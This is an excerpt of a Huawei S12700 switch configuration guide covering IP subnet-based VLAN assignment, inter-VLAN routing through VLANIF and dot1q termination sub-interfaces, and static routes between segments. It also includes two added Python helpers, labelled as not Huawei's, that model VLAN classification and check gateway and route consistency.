<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 100 200 300 //Create VLAN 100, VLAN 200, and VLAN 300 in a batch.

Step 2 Configure interfaces.


[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type hybrid //IP subnet-based VLAN
assignment can only be enabled on hybrid interfaces. The default link type of an
interface is not hybrid, so you need to manually configure the hybrid interface.
[Switch-GigabitEthernet1/0/1] port hybrid untagged vlan 100 200 300 //Add the
interface to VLANs 100, 200, and 300 in untagged mode.
[Switch-GigabitEthernet1/0/1] ip-subnet-vlan enable //Enable IP subnet-based
VLAN assignment.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk //Configure the link type of
the interface as trunk.
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 100 200 300
[Switch-GigabitEthernet1/0/2] quit

Step 3 Configure IP subnet-based VLAN assignment.


[Switch] vlan 100


[Switch-vlan100] ip-subnet-vlan 1 ip 192.168.1.2 24 priority 2 //Configure the
device to forward packets with the IP address of 192.168.1.2/24 and priority of 2
in VLAN 100.
[Switch-vlan100] quit
[Switch] vlan 200
[Switch-vlan200] ip-subnet-vlan 1 ip 192.168.2.2 24 priority 3 //Configure the
device to forward packets with the IP address of 192.168.2.2/24 and priority of 3
in VLAN 200.
[Switch-vlan200] quit
[Switch] vlan 300
[Switch-vlan300] ip-subnet-vlan 1 ip 192.168.3.2 24 priority 4 //Configure the
device to forward packets with the IP address of 192.168.3.2/24 and priority of 4
in VLAN 300.
[Switch-vlan300] quit

Step 4 Verify the configuration.


# Run the display ip-subnet-vlan vlan all command on the switch. The following
information is displayed:
[Switch] display ip-subnet-vlan vlan all
----------------------------------------------------------------
Vlan Index IpAddress SubnetMask Priority
----------------------------------------------------------------
100 1 192.168.1.2 255.255.255.0 2
200 1 192.168.2.2 255.255.255.0 3
300 1 192.168.3.2 255.255.255.0 4
----------------------------------------------------------------
ip-subnet-vlan count: 3 total count: 3

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
vlan batch 100 200 300
#
vlan 100
ip-subnet-vlan 1 ip 192.168.1.2 255.255.255.0 priority 2
vlan 200
ip-subnet-vlan 1 ip 192.168.2.2 255.255.255.0 priority 3
vlan 300
ip-subnet-vlan 1 ip 192.168.3.2 255.255.255.0 priority 4
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid untagged vlan 100 200 300
ip-subnet-vlan enable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100 200 300
#
return
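The classification the switch performs with the configuration above, as an added example that is not part of Huawei's documentation or code: it parses the page's three ip-subnet-vlan lines and assigns VLAN and priority to untagged frames by source IP address. The longest-prefix tie-break, the PVID fallback (VLAN 1) and the check that the interface carries the matched VLAN are modelling assumptions.

```python
"""Model of IP subnet-based VLAN assignment on a hybrid interface.

Added example; it is not Huawei code.  It reproduces the behaviour the
example above configures: an untagged frame entering a hybrid interface
with `ip-subnet-vlan enable` is tagged with the VLAN and 802.1p priority of
the `ip-subnet-vlan` entry whose subnet contains the frame's source IP
address; a frame that matches no entry falls back to the interface PVID,
and a frame that already carries a VLAN tag is not reclassified.
Assumptions of this model: when several entries match, the longest prefix
wins, and the matched VLAN must be one the interface carries.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class SubnetVlanEntry:
    vlan: int
    index: int
    network: ipaddress.IPv4Network
    priority: int


def parse_ip_subnet_vlan(vlan: int, line: str) -> SubnetVlanEntry:
    """Parse `ip-subnet-vlan <index> ip <address> <mask-or-length> priority <p>`
    as typed in the VLAN view (`24`) or stored in the config file (`255.255.255.0`)."""
    tok = line.split()
    if len(tok) != 7 or (tok[0], tok[2], tok[5]) != ("ip-subnet-vlan", "ip", "priority"):
        raise ValueError(f"not an ip-subnet-vlan line: {line!r}")
    # strict=False: the page configures host addresses such as 192.168.1.2/24,
    # and the switch keys on the subnet the address falls in.
    net = ipaddress.IPv4Network(f"{tok[3]}/{tok[4]}", strict=False)
    return SubnetVlanEntry(vlan, int(tok[1]), net, int(tok[6]))


@dataclass(frozen=True)
class HybridPort:
    pvid: int                              # VLAN for untagged frames matching nothing
    allowed: frozenset                     # VLANs the interface carries
    entries: Tuple[SubnetVlanEntry, ...]   # ip-subnet-vlan table, enable assumed


def classify(port: HybridPort, src_ip: str, tag: Optional[int] = None,
             tag_priority: int = 0) -> Optional[Tuple[int, int]]:
    """Return the (vlan, priority) the frame is forwarded with, or None if dropped."""
    if tag is not None:
        # Tagged ingress: subnet-based assignment does not apply; the interface
        # only checks that it carries the VLAN named in the tag.
        return (tag, tag_priority) if tag in port.allowed else None
    ip = ipaddress.IPv4Address(src_ip)
    hits = [e for e in port.entries if ip in e.network]
    if not hits:
        return (port.pvid, 0)              # interface-based assignment as fallback
    best = max(hits, key=lambda e: e.network.prefixlen)
    if best.vlan not in port.allowed:
        return None
    # Note for operators: the key is the sender's own source address, so this
    # mode sorts traffic by subnet but is not an access-control boundary; the
    # table above reserves "high security" for policy-based assignment.
    return (best.vlan, best.priority)


def page_port() -> HybridPort:
    """GE1/0/1 as configured in the example above (PVID 1 is the switch default)."""
    entries = tuple(parse_ip_subnet_vlan(vlan, line) for vlan, line in [
        (100, "ip-subnet-vlan 1 ip 192.168.1.2 24 priority 2"),
        (200, "ip-subnet-vlan 1 ip 192.168.2.2 24 priority 3"),
        (300, "ip-subnet-vlan 1 ip 192.168.3.2 24 priority 4"),
    ])
    return HybridPort(pvid=1, allowed=frozenset({1, 100, 200, 300}), entries=entries)


if __name__ == "__main__":
    port = page_port()
    for src in ("192.168.1.2", "192.168.3.77", "10.0.0.5"):
        print(src, "->", classify(port, src))
```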


6.3.6 Example for Directly Connecting a Terminal to a Layer 3 Gateway to Implement Inter-VLAN Communication
Inter-VLAN Communication Overview
After VLANs are assigned, broadcast packets are only forwarded within the same VLAN.
That is, hosts in different VLANs cannot communicate at Layer 2 because VLAN technology
isolates broadcast domains. In real-world applications, hosts in different VLANs often need to
communicate, so inter-VLAN communication needs to be implemented to resolve this. Layer
3 routing or VLAN technology is required to implement inter-VLAN communication.
Huawei provides a variety of technologies to implement inter-VLAN communication. The
following two technologies are commonly used:
l VLANIF interface
A VLANIF interface is a Layer 3 logical interface. You can configure an IP address for a
VLANIF interface to implement inter-VLAN Layer 3 communication.
l Dot1q termination sub-interface
Similar to a VLANIF interface, a sub-interface is also a Layer 3 logical interface. You
can configure dot1q termination and an IP address for a sub-interface to implement inter-
VLAN Layer 3 communication.
It is simple to configure a VLANIF interface, so VLANIF interfaces are the most commonly
used for inter-VLAN communication. However, a VLANIF interface needs to be configured
for each VLAN and each VLANIF interface requires an IP address, which wastes IP
addresses.
The VLANIF interface and Dot1q termination sub-interface can only allow hosts on different
network segments in different VLANs to communicate, whereas super-VLAN (VLAN
aggregation) and the VLAN Switch function allow hosts on the same network segment in
different VLANs to communicate.

Configuration Notes
l The default gateway address of hosts in a VLAN must be the IP address of the VLANIF
interface that corresponds to the VLAN.
l This example applies to all versions of the S12700.

Networking Requirements
Different user hosts of an enterprise transmit the same service, and are located on different
network segments. User hosts transmitting the same service belong to different VLANs and
need to communicate.
As shown in Figure 6-13, User1 and User2 access the same service but belong to different
VLANs and are located on different network segments. User1 and User2 need to
communicate.


Figure 6-13 Networking for configuring inter-VLAN communication using VLANIF interfaces
[Figure: Switch with GE1/0/1 in VLAN 10 (VLANIF10, 10.10.10.2/24) connected to User1 (10.10.10.3/24), and GE1/0/2 in VLAN 20 (VLANIF20, 10.10.20.2/24) connected to User2 (10.10.20.3/24)]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs and determine the VLANs to which users belong.
2. Add interfaces to VLANs and configure the interfaces to allow the VLANs.
3. Create VLANIF interfaces and configure IP addresses for the VLANIF interfaces to
implement Layer 3 connectivity.

Procedure
Step 1 Configure the switch.
# Create VLANs, and configure interfaces on the switch connected to user hosts as access
interfaces and add them to VLANs.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access //Configure the link type
of the interface as access.
[Switch-GigabitEthernet1/0/1] port default vlan 10 //Add the interface to VLAN
10.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

# Assign IP addresses to VLANIF interfaces.


[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.10.10.2 24 //Set the IP address of VLANIF 10 to
10.10.10.2/24.
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 10.10.20.2 24 //Set the IP address of VLANIF 20 to
10.10.20.2/24.
[Switch-Vlanif20] quit

Step 2 Verify the configuration.


Configure the IP address of 10.10.10.3/24 and default gateway address as 10.10.10.2/24
(VLANIF 10's IP address) for User1 in VLAN 10.


Configure the IP address of 10.10.20.3/24 and default gateway address as 10.10.20.2/24
(VLANIF 20's IP address) for User2 in VLAN 20.
After the configuration is complete, User1 in VLAN 10 and User2 in VLAN 20 can
communicate.

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
vlan batch 10 20
#
interface Vlanif10
ip address 10.10.10.2 255.255.255.0
#
interface Vlanif20
ip address 10.10.20.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
return


6.3.7 Example for Connecting a Terminal to a Layer 3 Gateway Through a Layer 2 Switch
Overview
After VLANs are assigned, broadcast packets are only forwarded within the same VLAN.
That is, hosts in different VLANs cannot communicate at Layer 2 because VLAN technology
isolates broadcast domains. In real-world applications, hosts in different VLANs often need to
communicate, so inter-VLAN communication needs to be implemented to resolve this. Layer
3 routing or VLAN technology is required to implement inter-VLAN communication.
Huawei provides a variety of technologies to implement inter-VLAN communication. The
following two technologies are commonly used:
l VLANIF interface
A VLANIF interface is a Layer 3 logical interface. You can configure an IP address for a
VLANIF interface to implement inter-VLAN Layer 3 communication.


l Dot1q termination sub-interface


Similar to a VLANIF interface, a sub-interface is also a Layer 3 logical interface. You
can configure dot1q termination and an IP address for a sub-interface to implement inter-
VLAN Layer 3 communication.
Compared with inter-VLAN communication through a VLANIF interface, inter-VLAN
communication through a dot1q termination sub-interface applies to the scenario where an
Ethernet interface connects to many VLANs. There are communication bottlenecks when the
network is busy. This is because data flows from different VLANs preempt the bandwidth of
the primary Ethernet interface.
The VLANIF interface and Dot1q termination sub-interface can only allow hosts on different
network segments in different VLANs to communicate, whereas super-VLAN (VLAN
aggregation) and the VLAN Switch function allow hosts on the same network segment in
different VLANs to communicate.

Configuration Notes
l On the S12700, only E series cards, X1E series cards, and SC cards among S series
support the termination sub-interface. For details, see the card classification in Hardware
Description.
X1E series cards support the termination sub-interface in V200R007C00 and later
versions.
l For Layer 2 interfaces, only hybrid and trunk interfaces support termination sub-
interfaces.
l The VLAN IDs terminated by a sub-interface cannot be created in the system view or be
displayed.
l This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-14, Host A and Host B belong to the R&D department, and Host C and
Host D belong to the quality department. The two departments are connected through a Layer
2 switch, and require Layer 2 isolation and Layer 3 connectivity.


Figure 6-14 Networking for connecting a terminal to a Layer 3 gateway through a Layer 2 switch
[Figure: SwitchB sub-interfaces GE1/0/1.1 (1.1.1.1/24) and GE1/0/1.2 (2.2.2.1/24) connect to SwitchA GE1/0/5; SwitchA GE1/0/1 and GE1/0/2 connect Host A (1.1.1.2) and Host B (1.1.1.3) of the R&D department in VLAN 2; SwitchA GE1/0/3 and GE1/0/4 connect Host C (2.2.2.2) and Host D (2.2.2.3) of the quality department in VLAN 3]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure interface-based assignment on the Layer 2 switch to implement Layer 2
isolation.
2. Configure sub-interface termination on the Layer 3 switch to implement Layer 3
connectivity.

Procedure
Step 1 Configure Layer 2 switch SwitchA.
# Create VLANs.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA //Change the device name to SwitchA for easy
identification.
[SwitchA] vlan batch 2 to 3 //Create VLAN 2 and VLAN 3 in a batch.

# Add the interface connected to the host to VLANs.


[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access //Configure the interface
connected to the PC as the access interface.
[SwitchA-GigabitEthernet1/0/1] port default vlan 2 //Add Host A to VLAN 2.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 2 //Add Host B to VLAN 2.
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type access //Configure the interface
connected to the PC as the access interface.


[SwitchA-GigabitEthernet1/0/3] port default vlan 3 //Add Host C to VLAN 3.
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] port link-type access
[SwitchA-GigabitEthernet1/0/4] port default vlan 3 //Add Host D to VLAN 3.
[SwitchA-GigabitEthernet1/0/4] quit

# Enable the interface connected to the Layer 3 switch to transparently transmit packets from
a specified VLAN.
[SwitchA] interface gigabitethernet 1/0/5
[SwitchA-GigabitEthernet1/0/5] port link-type trunk //Configure the interface
connected to the switch as the trunk interface.
[SwitchA-GigabitEthernet1/0/5] port trunk allow-pass vlan 2 to 3 //Add the
interface to VLAN 2 and VLAN 3.
[SwitchA-GigabitEthernet1/0/5] quit

Step 2 Configure Layer 3 switch SwitchB.


<HUAWEI> system-view
[HUAWEI] sysname SwitchB //Change the device name to SwitchB.
[SwitchB] interface gigabitethernet1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type hybrid
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface gigabitethernet1/0/1.1 //Create a sub-interface and enter
the sub-interface view.
[SwitchB-GigabitEthernet1/0/1.1] dot1q termination vid 2 //Set the VLAN ID for
dot1q termination on GE1/0/1.1 to VLAN 2.
[SwitchB-GigabitEthernet1/0/1.1] ip address 1.1.1.1 24
[SwitchB-GigabitEthernet1/0/1.1] arp broadcast enable //A termination sub-interface
directly discards broadcast packets, so the sub-interface needs to be configured to
forward ARP broadcast packets.
[SwitchB-GigabitEthernet1/0/1.1] quit
[SwitchB] interface gigabitethernet1/0/1.2 //Create a sub-interface and enter
the sub-interface view.
[SwitchB-GigabitEthernet1/0/1.2] dot1q termination vid 3 //Set the VLAN ID for
dot1q termination on GE1/0/1.2 to VLAN 3.
[SwitchB-GigabitEthernet1/0/1.2] ip address 2.2.2.1 24
[SwitchB-GigabitEthernet1/0/1.2] arp broadcast enable
[SwitchB-GigabitEthernet1/0/1.2] quit

Step 3 Verify the configuration.


Configure the IP address 1.1.1.2/24 for Host A and the default gateway address as the IP
address 1.1.1.1/24 of GE1/0/1.1.
Configure the IP address 1.1.1.3/24 for Host B and the default gateway address as the IP
address 1.1.1.1/24 of GE1/0/1.1.
Configure the IP address 2.2.2.2/24 for Host C and the default gateway address as the IP
address 2.2.2.1/24 of GE1/0/1.2.
Configure the IP address 2.2.2.3/24 for Host D and the default gateway address as the IP
address 2.2.2.1/24 of GE1/0/1.2.
After the configuration is complete, Host A, Host B, Host C, and Host D can ping each other
and communicate at Layer 3.

----End

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA


#
vlan batch 2 to 3
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 2
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 2
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 3
#
interface GigabitEthernet1/0/4
port link-type access
port default vlan 3
#
interface GigabitEthernet1/0/5
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
return

Configuration file of SwitchB


#
sysname SwitchB
#
interface GigabitEthernet1/0/1
port link-type hybrid
#
interface GigabitEthernet1/0/1.1
dot1q termination vid 2
ip address 1.1.1.1 255.255.255.0
arp broadcast enable
#
interface GigabitEthernet1/0/1.2
dot1q termination vid 3
ip address 2.2.2.1 255.255.255.0
arp broadcast enable
#
return

6.3.8 Example for Configuring Communication Between Different Network Segments Through Static Routes
Overview
In addition to configuring an IP address for a VLANIF interface, you need to configure a
static route or a dynamic routing protocol when PCs on different network segments across
several switches need to communicate. This is because only a direct route is generated for the
VLANIF interface's IP address on the switch, so a VLANIF interface can only implement
interworking between PCs on different network segments through one switch.
Static routes can be easily configured and have low requirements on the system. They are
applicable to simple, stable, and small-scale networks. However, static routes cannot
automatically adapt to changes in the network topology, and manual intervention is required.
With routing algorithms, dynamic routing protocols can automatically adapt to changes in the
network topology. They are applicable to the network where some Layer 3 devices are
deployed. The configurations of dynamic routes are complex. Dynamic routes have higher
requirements on the system than static ones and consume more network and system resources.


Configuration Notes
This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-15, to ensure security and facilitate management, an enterprise assigns
a VLAN for a server. The user device belongs to VLAN 10, and the server belongs to VLAN
20. Access, aggregation, and core switches are deployed between the user and server. Access
switches are Layer 2 switches, and aggregation and core switches are Layer 3 switches. The
user and server need to communicate with each other due to service requirements.

Figure 6-15 Networking for configuring communication between different network segments
through static routes
[Figure: core switch CORE (VLANIF20: 192.168.1.1/24) with GE1/0/3 toward AGG and GE1/0/2 toward ACC2; aggregation switch AGG (VLANIF10: 10.1.1.1/24) with GE1/0/3 toward CORE and GE1/0/2 toward ACC1; access switches ACC1 and ACC2 each uplink on GE1/0/2 and connect on GE1/0/1 the user (VLAN 10, IP address 10.1.1.2/24, gateway 10.1.1.1) and the server (VLAN 20, IP address 192.168.1.2/24, gateway 192.168.1.1)]

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure interface-based VLAN assignment to implement Layer 2 communication.


2. Configure VLANIF 10 on the aggregation switch AGG and configure an IP address for
VLANIF 10 as the gateway address of the user; configure VLANIF 20 on the core
switch CORE and configure an IP address for VLANIF 20 as the gateway address of the
server.
3. On the aggregation switch AGG, configure a static route from AGG to the network
segment of VLANIF 20; on the core switch CORE, configure a static route from CORE
to the network segment of VLANIF 10. The communication across network segments is
therefore implemented.


Procedure
Step 1 Configure the access switch ACC1.

# Create VLANs.
<HUAWEI> system-view
[HUAWEI] sysname ACC1 //Change the device name to ACC1 for easy identification.
[ACC1] vlan batch 10 //Create VLAN 10 in a batch.

# Add interfaces to VLANs.


[ACC1] interface gigabitethernet 1/0/1
[ACC1-GigabitEthernet1/0/1] port link-type access //Configure the interface
connected to a user host as the access interface.
[ACC1-GigabitEthernet1/0/1] port default vlan 10 //Add the user device to VLAN
10.
[ACC1-GigabitEthernet1/0/1] quit
[ACC1] interface gigabitethernet 1/0/2
[ACC1-GigabitEthernet1/0/2] port link-type trunk //Configure the interface
connected to the aggregation switch as the trunk interface.
[ACC1-GigabitEthernet1/0/2] port trunk allow-pass vlan 10 //Add the interface
connected to the aggregation switch to VLAN 10.
[ACC1-GigabitEthernet1/0/2] quit

Step 2 Configure the access switch ACC2.

# Create VLANs.
<HUAWEI> system-view
[HUAWEI] sysname ACC2 //Change the device name to ACC2.
[ACC2] vlan batch 20 //Create VLAN 20 in a batch.

# Add interfaces to VLANs.


[ACC2] interface gigabitethernet 1/0/1
[ACC2-GigabitEthernet1/0/1] port link-type access //Configure the interface
connected to the server as the access interface.
[ACC2-GigabitEthernet1/0/1] port default vlan 20 //Add the server to VLAN 20.
[ACC2-GigabitEthernet1/0/1] quit
[ACC2] interface gigabitethernet 1/0/2
[ACC2-GigabitEthernet1/0/2] port link-type trunk //Configure the interface
connected to the core switch as the trunk interface.
[ACC2-GigabitEthernet1/0/2] port trunk allow-pass vlan 20 //Add the interface
connected to the core switch to VLAN 20.
[ACC2-GigabitEthernet1/0/2] quit

Step 3 Configure the aggregation switch AGG.

# Create VLANs.
<HUAWEI> system-view
[HUAWEI] sysname AGG //Change the device name to AGG.
[AGG] vlan batch 10 30 //Create VLAN 10 and VLAN 30 in a batch.

# Add interfaces to VLANs.


[AGG] interface gigabitethernet 1/0/2
[AGG-GigabitEthernet1/0/2] port link-type trunk //Configure the interface as the
trunk interface.
[AGG-GigabitEthernet1/0/2] port trunk allow-pass vlan 10 //Add the interface to
VLAN 10.
[AGG-GigabitEthernet1/0/2] quit
[AGG] interface gigabitethernet 1/0/3
[AGG-GigabitEthernet1/0/3] port link-type trunk //Configure the interface as the
trunk interface.
[AGG-GigabitEthernet1/0/3] port trunk allow-pass vlan 30 //Add the interface
connected to the core switch to VLAN 30.


[AGG-GigabitEthernet1/0/3] quit

# Create VLANIF 10 and configure an IP address for VLANIF 10 as the gateway address.
[AGG] interface vlanif 10 //Create VLANIF 10.
[AGG-Vlanif10] ip address 10.1.1.1 24 //Configure an IP address for VLANIF 10.
The IP address is the gateway address.
[AGG-Vlanif10] quit

# Create VLANIF 30 and configure an IP address for VLANIF 30.


[AGG] interface vlanif 30 //Create VLANIF 30.
[AGG-Vlanif30] ip address 10.10.30.1 24 //Configure an IP address for VLANIF 30.
The IP address cannot conflict with IP addresses of the user and server.
[AGG-Vlanif30] quit

# Configure a static route so that the PC can access the server.


[AGG] ip route-static 192.168.1.0 255.255.255.0 10.10.30.2 //Configure a static
route. The packets with the destination IP address of 192.168.1.0/24 are
forwarded to the IP address 10.10.30.2 of VLANIF 30 on the core switch.

Step 4 Configure the core switch CORE.


# Create VLANs.
<HUAWEI> system-view
[HUAWEI] sysname CORE //Change the device name to CORE.
[CORE] vlan batch 20 30 //Create VLAN 20 and VLAN 30 in a batch.

# Add interfaces to VLANs.


[CORE] interface gigabitethernet 1/0/2
[CORE-GigabitEthernet1/0/2] port link-type trunk //Configure the interface as
the trunk interface.
[CORE-GigabitEthernet1/0/2] port trunk allow-pass vlan 20 //Add the interface to
VLAN 20.
[CORE-GigabitEthernet1/0/2] quit
[CORE] interface gigabitethernet 1/0/3
[CORE-GigabitEthernet1/0/3] port link-type trunk //Configure the interface as
the trunk interface.
[CORE-GigabitEthernet1/0/3] port trunk allow-pass vlan 30 //Add the interface to
VLAN 30.
[CORE-GigabitEthernet1/0/3] quit

# Create VLANIF 20 and configure an IP address for VLANIF 20 as the gateway address of
the server.
[CORE] interface vlanif 20 //Create VLANIF 20.
[CORE-Vlanif20] ip address 192.168.1.1 24 //Configure an IP address for VLANIF
20. The IP address is the gateway address of the server.
[CORE-Vlanif20] quit

# Create VLANIF 30 and configure an IP address for VLANIF 30.


[CORE] interface vlanif 30 //Create VLANIF 30.
[CORE-Vlanif30] ip address 10.10.30.2 24 //Configure an IP address for VLANIF 30.
[CORE-Vlanif30] quit

# Configure a static route so that the server and PC can access each other.
[CORE] ip route-static 10.1.1.0 255.255.255.0 10.10.30.1 //Configure a static
route. The packets with the destination IP address of 10.1.1.0/24 are forwarded
to the IP address 10.10.30.1 of VLANIF 30 on the aggregation switch.

Step 5 Verify the configuration.


Configure the IP address of 10.1.1.2/24 for the PC in VLAN 10 and the default gateway
address as 10.1.1.1 (VLANIF 10's IP address).


Configure the IP address of 192.168.1.2/24 for the server in VLAN 20 and the default
gateway address as 192.168.1.1 (VLANIF 20's IP address).
After the configuration is complete, the PC in VLAN 10 and the server in VLAN 20 can
access each other.

----End

Configuration Files
Configuration file of ACC1
#
sysname ACC1
#
vlan batch 10
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10
#
return

Configuration file of ACC2


#
sysname ACC2
#
vlan batch 20
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
return

Configuration file of the aggregation switch AGG


#
sysname AGG
#
vlan batch 10 30
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif30
ip address 10.10.30.1 255.255.255.0
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 30
#
ip route-static 192.168.1.0 255.255.255.0 10.10.30.2
#
return


Configuration file of the core switch CORE


#
sysname CORE
#
vlan batch 20 30
#
interface Vlanif20
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif30
ip address 10.10.30.2 255.255.255.0
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 30
#
ip route-static 10.1.1.0 255.255.255.0 10.10.30.1
#
return
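A consistency check for the designs of 6.3.6 to 6.3.8, added here as an example and not part of Huawei's documentation: it parses excerpts of the AGG and CORE configuration files above and verifies that each host's gateway is a Layer 3 interface on its own subnet and that the static routes are directly connected and reciprocal. The parser handles only the keywords that occur on this page (sysname, interface, ip address, ip route-static).

```python
"""Consistency checks for the gateway and static-route designs in 6.3.6 to 6.3.8.

Added example; it is not Huawei code.  It parses excerpts of the configuration
files on this page (VRP syntax: a `#` line closes the current view, `ip address`
takes a dotted mask) and checks what the examples depend on: a host's gateway
must be a VLANIF or dot1q termination sub-interface address on the host's own
subnet (Configuration Notes of 6.3.6), and a static route's next hop must be
directly connected and owned by the peer, which must hold the return route.
"""
import ipaddress
from typing import List, Tuple

# Excerpts of the AGG and CORE configuration files on this page (only the
# lines the checks need).
AGG_CFG = """\
sysname AGG
interface Vlanif10
 ip address 10.1.1.1 255.255.255.0
#
interface Vlanif30
 ip address 10.10.30.1 255.255.255.0
#
ip route-static 192.168.1.0 255.255.255.0 10.10.30.2
"""
CORE_CFG = """\
sysname CORE
interface Vlanif20
 ip address 192.168.1.1 255.255.255.0
#
interface Vlanif30
 ip address 10.10.30.2 255.255.255.0
#
ip route-static 10.1.1.0 255.255.255.0 10.10.30.1
"""


def parse_config(text: str) -> dict:
    """Return sysname, {interface name: IPv4Interface} and [(dest net, next hop)]."""
    cfg = {"sysname": "", "interfaces": {}, "routes": []}
    current = None
    for raw in text.splitlines():
        tok = raw.split()
        if not tok or tok[0] == "#":
            current = None                      # '#' closes the current view
            continue
        if tok[0] == "sysname":
            cfg["sysname"] = tok[1]
        elif tok[0] == "interface":
            current = tok[1]
        elif tok[:2] == ["ip", "address"] and current:
            cfg["interfaces"][current] = ipaddress.IPv4Interface(f"{tok[2]}/{tok[3]}")
        elif tok[:2] == ["ip", "route-static"]:
            cfg["routes"].append((ipaddress.IPv4Network(f"{tok[2]}/{tok[3]}"),
                                  ipaddress.IPv4Address(tok[4])))
    return cfg


def check_gateway(cfg: dict, host_ip: str, gateway: str) -> Tuple[bool, str]:
    """The gateway must be a Layer 3 interface of cfg on the host's own subnet."""
    host, gw = ipaddress.IPv4Interface(host_ip), ipaddress.IPv4Address(gateway)
    for name, iface in cfg["interfaces"].items():
        if iface.ip == gw:
            if host.network == iface.network:
                return True, f"{cfg['sysname']}: {name} {iface} is the gateway of {host}"
            return False, f"{cfg['sysname']}: {name} owns {gw}, but {iface.network} is not {host.network}"
    return False, f"{cfg['sysname']}: no Layer 3 interface owns {gw}"


def check_static_routes(local: dict, peer: dict) -> List[str]:
    """Each static route on `local` must point at a connected address owned by `peer`,
    and `peer` must route back to every non-transit subnet of `local`."""
    problems = []
    for dst, nh in local["routes"]:
        transit = [i.network for i in local["interfaces"].values() if nh in i.network]
        if not transit:
            problems.append(f"{local['sysname']}: next hop {nh} for {dst} is not directly connected")
            continue
        if not any(i.ip == nh for i in peer["interfaces"].values()):
            problems.append(f"{local['sysname']}: next hop {nh} is not an address of {peer['sysname']}")
        for name, iface in local["interfaces"].items():
            if iface.network in transit:
                continue
            back = any(r == iface.network for r, _ in peer["routes"]) or \
                any(p.network == iface.network for p in peer["interfaces"].values())
            if not back:        # only one direction would work, so pings fail
                problems.append(f"{peer['sysname']}: no return route to {iface.network} ({local['sysname']} {name})")
    return problems


def run_page_checks() -> dict:
    """Apply the checks to Figure 6-15: user 10.1.1.2/24 behind AGG, server 192.168.1.2/24 behind CORE."""
    agg, core = parse_config(AGG_CFG), parse_config(CORE_CFG)
    return {
        "user_gateway": check_gateway(agg, "10.1.1.2/24", "10.1.1.1")[0],
        "server_gateway": check_gateway(core, "192.168.1.2/24", "192.168.1.1")[0],
        "route_problems": check_static_routes(agg, core) + check_static_routes(core, agg),
    }
```

Removing either ip route-static line from the excerpts makes the checker report the missing return route, which is the asymmetric-routing mistake that leaves the user-to-server ping failing even though the gateway configuration is correct.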

6.3.9 Example for Configuring the Super-VLAN

Super-VLAN Overview
Super-VLAN, also called VLAN aggregation, reduces the number of IP addresses required,
isolates broadcast storms, and controls Layer 2 access on interfaces. A super-VLAN can be
associated with multiple sub-VLANs, which are isolated at Layer 2. All sub-VLANs use the
IP address of the corresponding VLANIF interface for the super-VLAN to implement Layer 3
connectivity with an external network, thereby reducing the number of IP addresses required.

The super-VLAN applies to scenarios where there are many users and VLANs, IP addresses
of devices in many VLANs are on the same network segment, and inter-VLAN Layer 2
isolation needs to be implemented. Inter-VLAN proxy ARP can be enabled to implement
inter-VLAN communication. The scenarios include hotels and residential buildings requiring
broadband access. A room or household is assigned a VLAN and isolated. An IP network
segment cannot be allocated to each VLAN because IP addresses are finite and there are many
VLANs. The VLANs can only share an IP network segment. Assume that the IP network
segment of VLAN 10 is 10.10.10.0/24. A household may use one or two IP addresses,
consuming over 200 IP addresses. Super-VLAN technology allows users in VLANs 11 to 100
to share the IP network segment of 10.10.10.0/24, thus reducing the number of IP addresses
required.

